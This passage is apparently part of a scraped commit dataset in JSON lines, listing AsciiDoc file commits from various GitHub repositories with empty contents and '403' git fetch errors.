inum\/spring-security,Xcorpio\/spring-security,ractive\/spring-security,olezhuravlev\/spring-security,rwinch\/spring-security,likaiwalkman\/spring-security,pwheel\/spring-security,fhanik\/spring-security,tekul\/spring-security,pwheel\/spring-security,djechelon\/spring-security,izeye\/spring-security,eddumelendez\/spring-security,likaiwalkman\/spring-security,adairtaosy\/spring-security,jgrandja\/spring-security,raindev\/spring-security,izeye\/spring-security,pwheel\/spring-security,adairtaosy\/spring-security,mdeinum\/spring-security,diegofernandes\/spring-security,spring-projects\/spring-security,ajdinhedzic\/spring-security,ajdinhedzic\/spring-security,raindev\/spring-security,adairtaosy\/spring-security,SanjayUser\/SpringSecurityPro,ajdinhedzic\/spring-security,wkorando\/spring-security,wilkinsona\/spring-security,jmnarloch\/spring-security,ollie314\/spring-security,mounb\/spring-security,MatthiasWinzeler\/spring-security,chinazhaoht\/spring-security,hippostar\/spring-security,spring-projects\/spring-security,mrkingybc\/spring-security,Xcorpio\/spring-security,spring-projects\/spring-security,mrkingybc\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,wilkinsona\/spring-security,pwheel\/spring-security,Peter32\/spring-security,zgscwjm\/spring-security,panchenko\/spring-security,pkdevbox\/spring-security,pkdevbox\/spring-security,xingguang2013\/spring-security,pkdevbox\/spring-security,mrkingybc\/spring-security,kazuki43zoo\/spring-security,liuguohua\/spring-security,rwinch\/spring-security,caiwenshu\/spring-security,zshift\/spring-security,ajdinhedzic\/spring-security,mparaz\/spring-security,thomasdarimont\/spring-security,driftman\/spring-security,chinazhaoht\/spring-security,yinhe402\/spring-security","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0071345a918f939c48f89e000fc7da2dd934940f","subject":"Dependencies","message":"Dependencies\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"JAX-RS client.adoc","new_file":"JAX-RS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53ab9014e633b4b69ea91aa4d49f8fe81ada4dbc","subject":"We are hiring - 48788","message":"We are hiring - 48788\n","repos":"objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/01\/05\/we-are-hiring.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/01\/05\/we-are-hiring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f2f6201963c6d73e81db8b853269bfa12e4a00d","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bc6bfab6f5fd6f355d5c3fbfb7d2c2f0df9f0ba","subject":"Update 2016-01-14-ElasticSearchrails.adoc","message":"Update 2016-01-14-ElasticSearchrails.adoc","repos":"regdog\/regdog.github.io,regdog\/regdog.github.io,regdog\/regdog.github.io","old_file":"_posts\/2016-01-14-ElasticSearchrails.adoc","new_file":"_posts\/2016-01-14-ElasticSearchrails.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/regdog\/regdog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d73f4aed5a84e590a2583d9fdc891ef1f2f9fe","subject":"Update 2016-03-02-A-Painted-On-Smile.adoc","message":"Update 2016-03-02-A-Painted-On-Smile.adoc","repos":"johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io","old_file":"_posts\/2016-03-02-A-Painted-On-Smile.adoc","new_file":"_posts\/2016-03-02-A-Painted-On-Smile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/johannewinwood\/johannewinwood.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"750881848d57f55d0bec7832e6028616d135db1b","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0604861db991f64caf21b59d7b366640084b6492","subject":"Update 2017-08-07-Fun-With-Asteroids.adoc","message":"Update 2017-08-07-Fun-With-Asteroids.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-08-07-Fun-With-Asteroids.adoc","new_file":"_posts\/2017-08-07-Fun-With-Asteroids.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"878361e43d61c46d495b141413f4358ddabdac2e","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40741a2675dbb4fc54befd6f78dfb647284ff627","subject":"Update 2015-09-14-Never-can-go.adoc","message":"Update 2015-09-14-Never-can-go.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-Never-can-go.adoc","new_file":"_posts\/2015-09-14-Never-can-go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d2d6ce0b28a6e0659cf9bb01c58efc7df8500d7","subject":"Update 2017-04-29-Quick-update.adoc","message":"Update 2017-04-29-Quick-update.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-29-Quick-update.adoc","new_file":"_posts\/2017-04-29-Quick-update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e1a09c789c9e9ff53b8bb4df3857ad158136e28","subject":"Publish 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","message":"Publish 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_file":"2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88a4e6c740ebf0440f4bfe232a6088b4419b9f6c","subject":"Translate readme to asciidoc","message":"Translate readme to asciidoc\n","repos":"endragor\/Nim,haiodo\/Nim,greyanubis\/Nim,jfhg\/Nim,Salafit\/Nim,jfhg\/Nim,tmm1\/Nim,singularperturbation\/Nim,haiodo\/Nim,judofyr\/Nim,sferik\/Nim,nafsaka\/Nim,fredericksilva\/Nim,zachaysan\/Nim,jsanjuas\/Nim,endragor\/Nim,msmith491\/Nim,Dhertz\/Nim,tmm1\/Nim,fredericksilva\/Nim,fredericksilva\/Nim,Senketsu\/Nim,nimLuckyBull\/Nim,JCavallo\/Nim,nanoant\/Nim,Dhertz\/Nim,Senketsu\/Nim,jsanjuas\/Nim,nafsaka\/Nim,nafsaka\/Nim,endragor\/Nim,douglas-larocca\/Nim,mbaulch\/Nim,judofyr\/Nim,sarvex\/Nim-lang,jfhg\/Nim,Dhertz\/Nim,Salafit\/Nim,Dhertz\/Nim,sarvex\/Nim-lang,reactormonk\/nim,BlaXpirit\/nre,fredericksilva\/Nim,Salafit\/Nim,sarvex\/Nim-lang,Senketsu\/Nim,sferik\/Nim,Salafit\/Nim,russpowers\/Nim,reactormonk\/nim,reactormonk\/nim,mbaulch\/Nim,fmamud\/Nim,jsanjuas\/Nim,haiodo\/Nim,tulayang\/Nim,dom96\/Nim,JCavallo\/Nim,JCavallo\/Nim,sarvex\/Nim-lang,greyanubis\/Nim,tulayang\/Nim,greyanubis\/Nim,fmamud\/Nim,zachaysan\/Nim,singularperturbation\/Nim,xland\/Nim,nimLuckyBull\/Nim,endragor\/Nim,tmm1\/Nim,douglas-larocca\/Nim,tmm1\/Nim,douglas-larocca\/Nim,russpowers\/Nim,xland\/Nim,msmith491\/Nim,haiodo\/Nim,bvssvni\/Nim,nimLuckyBull\/Nim,douglas-larocca\/Nim,endragor\/Nim,nanoant\/Nim,jfhg\/Nim,judofyr\/Nim,singularperturbation\/Nim,sarvex\/Nim-lang,jsanjuas\/Nim,zachaysan\/Nim,bvssvni\/Nim,russpowers\/Nim,sferik\/Nim,endragor\/Nim,nimLuckyBull\/Nim,Matt14916\/Nim,judofyr\/Nim,haiodo\/Nim,douglas-larocca\/Nim,tulayang\/Nim,endragor\/Nim,tulayang\/Nim,fredericksilva\/Nim,haiodo\/Nim,singularperturbation\/Nim,Salafit\/Nim,BlaXpirit\/nre,jsanjuas\/Nim,nanoant\/Nim,tulayang\/Nim,Matt14916\/Nim,msmith491\/Nim,bvssvni\/Nim,greyanubis\/Nim,Salafit\/Nim,reactormonk\/nim,dom96\/Nim,mbaulch\/Nim,tmm1\/Nim,nafsaka\/Nim,sarvex\/Nim-lang,msmith491\/Nim,russpowers\/Nim,tmm1\/Nim,jfhg\/Nim,jfhg\/Nim,fmamud\/Nim,nafsaka\/Nim,reactormonk\/nim,singularperturbation\/Nim,russpowers\/Nim,fmamud\/Nim,bvssvni\/Nim,dom96\/Nim,judofyr\/Nim,reactormonk\/nim,haiodo\/Nim,Dhertz\/Nim,Senketsu\/Nim,fmamud\/Nim,jsanjuas\/Nim,bvssvni\/Nim,fmamud\/Nim,mbaulch\/Nim,Matt14916\/Nim,bvssvni\/Nim,judofyr\/Nim,xland\/Nim,Dhertz\/Nim,tulayang\/Nim,zachaysan\/Nim,msmith491\/Nim,jfhg\/Nim,singularperturbation\/Nim,Salafit\/Nim,fmamud\/Nim,tmm1\/Nim,nimLuckyBull\/Nim,sferik\/Nim,flaviut\/nre,reactormonk\/nim,JCavallo\/Nim,Matt14916\/Nim,xland\/Nim,greyanubis\/Nim,Matt14916\/Nim,sferik\/Nim,greyanubis\/Nim,Senketsu\/Nim,msmith491\/Nim,zachaysan\/Nim,mbaulch\/Nim,Senketsu\/Nim,bvssvni\/Nim,dom96\/Nim,nafsaka\/Nim,xland\/Nim,judofyr\/Nim,nanoant\/Nim,greyanubis\/Nim,sarvex\/Nim-lang,zachaysan\/Nim,Senketsu\/Nim,nanoant\/Nim,JCavallo\/Nim,sferik\/Nim,Dhertz\/Nim,dom96\/Nim,nanoant\/Nim,douglas-larocca\/Nim,singularperturbation\/Nim,reactormonk\/nim,Matt14916\/Nim,mbaulch\/Nim,nimLuckyBull\/Nim,JCavallo\/Nim,dom96\/Nim,msmith491\/Nim,sferik\/Nim,sferik\/Nim,douglas-larocca\/Nim,Matt14916\/Nim,jsanjuas\/Nim,russpowers\/Nim,fredericksilva\/Nim,dom96\/Nim,mbaulch\/Nim,JCavallo\/Nim,xland\/Nim,nanoant\/Nim,nimLuckyBull\/Nim,nafsaka\/Nim,judofyr\/Nim,douglas-larocca\/Nim,russpowers\/Nim,zachaysan\/Nim,fredericksilva\/Nim,fredericksilva\/Nim,xland\/Nim","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tulayang\/Nim.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7419727a19015ef22cfea263525ab657e4fbac86","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/09\/26\/deref.adoc","new_file":"content\/news\/2022\/09\/26\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7ce7875dd02660da6e1c67ffbd2c5673388625b7","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/non_believers.adoc","new_file":"content\/writings\/non_believers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"99d8d6de16459f49407859dbad6379f65838c386","subject":"Update 2016-10-18-A-Horizontal-Career-Path.adoc","message":"Update 2016-10-18-A-Horizontal-Career-Path.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-18-A-Horizontal-Career-Path.adoc","new_file":"_posts\/2016-10-18-A-Horizontal-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26e625b85ba1dcd5f0f80c8c61ceee6709c523f9","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07baae9933b8cedec7a01ff3997d138ab9f40014","subject":"create post 3 Cool Gadgets Under $80","message":"create post 3 Cool Gadgets Under $80","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-$80.adoc","new_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-$80.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d7e68d4d65af157a136c86cd4ddc8e86d07cf53","subject":"Updated resilience4j-spring-boot README","message":"Updated resilience4j-spring-boot README\n","repos":"resilience4j\/resilience4j,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,drmaas\/resilience4j","old_file":"resilience4j-spring-boot\/README.adoc","new_file":"resilience4j-spring-boot\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92b789828533756fb9f3769ac2654d434d917476","subject":"Update 2015-02-12-Migrating-to-HubPress.adoc","message":"Update 2015-02-12-Migrating-to-HubPress.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2015-02-12-Migrating-to-HubPress.adoc","new_file":"_posts\/2015-02-12-Migrating-to-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2830b063b9684eae90c451dec0fe958be88284a3","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04726374b5da1993cc6634d602cbc3f1cd7c2818","subject":"Add README","message":"Add README\n","repos":"ciarand\/charlw-pagination","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciarand\/charlw-pagination.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"80ddca968619a7156c9e02b9fe1b6cbd9210d147","subject":"Added readme","message":"Added readme\n","repos":"noctarius\/dlang-arm-bare-metal","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noctarius\/dlang-arm-bare-metal.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d9c19cd8460964233f47471904966f79c0e08f74","subject":"[doc] Cat API: show open and closed indices in _cat\/indices","message":"[doc] Cat API: show open and closed indices in _cat\/indices\n\nRelated to #7936\n","repos":"umeshdangat\/elasticsearch,sc0ttkclark\/elasticsearch,hafkensite\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jchampion\/elasticsearch,mnylen\/elasticsearch,elancom\/elasticsearch,knight1128\/elasticsearch,mohit\/elasticsearch,acchen97\/elasticsearch,18098924759\/elasticsearch,kenshin233\/elasticsearch,wangtuo\/elasticsearch,linglaiyao1314\/elasticsearch,Clairebi\/ElasticsearchClone,iacdingping\/elasticsearch,jaynblue\/elasticsearch,Rygbee\/elasticsearch,tahaemin\/elasticsearch,winstonewert\/elasticsearch,rlugojr\/elasticsearch,nomoa\/elasticsearch,ZTE-PaaS\/elasticsearch,ckclark\/elasticsearch,MjAbuz\/elasticsearch,kubum\/elasticsearch,caengcjd\/elasticsearch,naveenhooda2000\/elasticsearch,Rygbee\/elasticsearch,hanst\/elasticsearch,MichaelLiZhou\/elasticsearch,trangvh\/elasticsearch,tebriel\/elasticsearch,camilojd\/elasticsearch,lydonchandra\/elasticsearch,alexbrasetvik\/elasticsearch,jimhooker2002\/elasticsearch,jprante\/elasticsearch,cnfire\/elasticsearch-1,yongminxia\/elasticsearch,aglne\/elasticsearch,vietlq\/elasticsearch,obourgain\/elasticsearch,queirozfcom\/elasticsearch,sreeramjayan\/elasticsearch,Collaborne\/elasticsearch,yongminxia\/elasticsearch,anti-social\/elasticsearch,hanswang\/elasticsearch,ouyangkongtong\/elasticsearch,caengcjd\/elasticsearch,scottsom\/elasticsearch,iacdingping\/elasticsearch,Charlesdong\/elasticsearch,vrkansagara\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,springning\/elasticsearch,iantruslove\/elasticsearch,lmtwga\/elasticsearch,fooljohnny\/elasticsearch,artnowo\/elasticsearch,petabytedata\/elasticsearch,trangvh\/elasticsearch,vingupta3\/elasticsearch,Ansh90\/elasticsearch,pozhidaevak\/elasticsearch,bestwpw\/elasticsearch,hirdesh2008\/elasticsearch,vietlq\/elasticsearch,martinstuga\/elasticsearch,karthikjaps\/elasticsearch,caengcjd\/elasticsearch,nazarewk\/elasticsearch,KimTaehee\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,rmuir\/elasticsearch,rajanm\/elasticsearch,milodky\/elasticsearch,C-Bish\/elasticsearch,amaliujia\/elasticsearch,huypx1292\/elasticsearch,kubum\/elasticsearch,polyfractal\/elasticsearch,tahaemin\/elasticsearch,kenshin233\/elasticsearch,mjhennig\/elasticsearch,kevinkluge\/elasticsearch,khiraiwa\/elasticsearch,robin13\/elasticsearch,nezirus\/elasticsearch,polyfractal\/elasticsearch,sarwarbhuiyan\/elasticsearch,mcku\/elasticsearch,sneivandt\/elasticsearch,YosuaMichael\/elasticsearch,khiraiwa\/elasticsearch,huypx1292\/elasticsearch,rento19962\/elasticsearch,MaineC\/elasticsearch,Uiho\/elasticsearch,MichaelLiZhou\/elasticsearch,dataduke\/elasticsearch,rajanm\/elasticsearch,drewr\/elasticsearch,yynil\/elasticsearch,fooljohnny\/elasticsearch,dylan8902\/elasticsearch,pritishppai\/elasticsearch,aglne\/elasticsearch,dpursehouse\/elasticsearch,qwerty4030\/elasticsearch,kaneshin\/elasticsearch,golubev\/elasticsearch,snikch\/elasticsearch,rmuir\/elasticsearch,wittyameta\/elasticsearch,mcku\/elasticsearch,areek\/elasticsearch,yynil\/elasticsearch,abibell\/elasticsearch,AndreKR\/elasticsearch,anti-social\/elasticsearch,gingerwizard\/elasticsearch,Collaborne\/elasticsearch,gfyoung\/elasticsearch,ydsakyclguozi\/elasticsearch,ulkas\/elasticsearch,ImpressTV\/elasticsearch,YosuaMichael\/elasticsearch,ZTE-PaaS\/elasticsearch,s1monw\/elasticsearch,sdauletau\/elasticsearch,kcompher\/elasticsearch,onegambler\/elasticsearch,kalimatas\/elasticsearch,lchennup\/elasticsearch,a2lin\/elasticsearch,KimTaehee\/elasticsearch,TonyChai24\/ESSource,andrejserafim\/elasticsearch,acchen97\/elasticsearch,wayeast\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,queirozfcom\/elasticsearch,episerver\/elasticsearch,sposam\/elasticsearch,dataduke\/elasticsearch,lchennup\/elasticsearch,njlawton\/elasticsearch,mortonsykes\/elasticsearch,mm0\/elasticsearch,artnowo\/elasticsearch,jpountz\/elasticsearch,infusionsoft\/elasticsearch,Kakakakakku\/elasticsearch,drewr\/elasticsearch,strapdata\/elassandra5-rc,jbertouch\/elasticsearch,mjhennig\/elasticsearch,lks21c\/elasticsearch,camilojd\/elasticsearch,thecocce\/elasticsearch,markwalkom\/elasticsearch,EasonYi\/elasticsearch,lightslife\/elasticsearch,truemped\/elasticsearch,tkssharma\/elasticsearch,Flipkart\/elasticsearch,Widen\/elasticsearch,djschny\/elasticsearch,areek\/elasticsearch,likaiwalkman\/elasticsearch,fforbeck\/elasticsearch,IanvsPoplicola\/elasticsearch,zkidkid\/elasticsearch,xingguang2013\/elasticsearch,HonzaKral\/elasticsearch,MjAbuz\/elasticsearch,shreejay\/elasticsearch,rhoml\/elasticsearch,njlawton\/elasticsearch,luiseduardohdbackup\/elasticsearch,fernandozhu\/elasticsearch,amit-shar\/elasticsearch,LeoYao\/elasticsearch,polyfractal\/elasticsearch,AshishThakur\/elasticsearch,yanjunh\/elasticsearch,naveenhooda2000\/elasticsearch,mgalushka\/elasticsearch,jimhooker2002\/elasticsearch,hirdesh2008\/elasticsearch,TonyChai24\/ESSource,StefanGor\/elasticsearch,lightslife\/elasticsearch,tahaemin\/elasticsearch,overcome\/elasticsearch,vingupta3\/elasticsearch,martinstuga\/elasticsearch,iacdingping\/elasticsearch,ESamir\/elasticsearch,geidies\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,LewayneNaidoo\/elasticsearch,kevinkluge\/elasticsearch,xuzha\/elasticsearch,golubev\/elasticsearch,elancom\/elasticsearch,palecur\/elasticsearch,yuy168\/elasticsearch,kubum\/elasticsearch,overcome\/elasticsearch,xpandan\/elasticsearch,amit-shar\/elasticsearch,achow\/elasticsearch,sreeramjayan\/elasticsearch,nknize\/elasticsearch,kaneshin\/elasticsearch,vroyer\/elasticassandra,hanst\/elasticsearch,PhaedrusTheGreek\/elasticsearch,pranavraman\/elasticsearch,lydonchandra\/elasticsearch,lydonchandra\/elasticsearch,likaiwalkman\/elasticsearch,bawse\/elasticsearch,springning\/elasticsearch,fekaputra\/elasticsearch,snikch\/elasticsearch,MichaelLiZhou\/elasticsearch,geidies\/elasticsearch,slavau\/elasticsearch,jimhooker2002\/elasticsearch,episerver\/elasticsearch,JervyShi\/elasticsearch,dylan8902\/elasticsearch,phani546\/elasticsearch,queirozfcom\/elasticsearch,YosuaMichael\/elasticsearch,hechunwen\/elasticsearch,mm0\/elasticsearch,franklanganke\/elasticsearch,skearns64\/elasticsearch,yuy168\/elasticsearch,infusionsoft\/elasticsearch,NBSW\/elasticsearch,TonyChai24\/ESSource,ivansun1010\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,iamjakob\/elasticsearch,GlenRSmith\/elasticsearch,F0lha\/elasticsearch,mbrukman\/elasticsearch,mapr\/elasticsearch,Rygbee\/elasticsearch,markharwood\/elasticsearch,pozhidaevak\/elasticsearch,knight1128\/elasticsearch,huypx1292\/elasticsearch,sreeramjayan\/elasticsearch,abibell\/elasticsearch,jaynblue\/elasticsearch,fernandozhu\/elasticsearch,snikch\/elasticsearch,Flipkart\/elasticsearch,drewr\/elasticsearch,ImpressTV\/elasticsearch,fernandozhu\/elasticsearch,vroyer\/elassandra,ivansun1010\/elasticsearch,qwerty4030\/elasticsearch,girirajsharma\/elasticsearch,queirozfcom\/elasticsearch,jango2015\/elasticsearch,humandb\/elasticsearch,kingaj\/elasticsearch,ESamir\/elasticsearch,mkis-\/elasticsearch,kenshin233\/elasticsearch,kaneshin\/elasticsearch,jimczi\/elasticsearch,drewr\/elasticsearch,djschny\/elasticsearch,a2lin\/elasticsearch,lightslife\/elasticsearch,cnfire\/elasticsearch-1,nazarewk\/elasticsearch,JervyShi\/elasticsearch,loconsolutions\/elasticsearch,golubev\/elasticsearch,strapdata\/elassandra-test,cwurm\/elasticsearch,codebunt\/elasticsearch,diendt\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch,mute\/elasticsearch,pranavraman\/elasticsearch,djschny\/elasticsearch,sarwarbhuiyan\/elasticsearch,dpursehouse\/elasticsearch,beiske\/elasticsearch,vrkansagara\/elasticsearch,Chhunlong\/elasticsearch,brandonkearby\/elasticsearch,kenshin233\/elasticsearch,onegambler\/elasticsearch,fred84\/elasticsearch,IanvsPoplicola\/elasticsearch,lchennup\/elasticsearch,andrejserafim\/elasticsearch,vietlq\/elasticsearch,kingaj\/elasticsearch,jaynblue\/elasticsearch,nrkkalyan\/elasticsearch,elancom\/elasticsearch,mjhennig\/elasticsearch,dpursehouse\/elasticsearch,coding0011\/elasticsearch,JSCooke\/elasticsearch,yongminxia\/elasticsearch,bawse\/elasticsearch,obourgain\/elasticsearch,18098924759\/elasticsearch,apepper\/elasticsearch,gingerwizard\/elasticsearch,ulkas\/elasticsearch,KimTaehee\/elasticsearch,vrkansagara\/elasticsearch,socialrank\/elasticsearch,mrori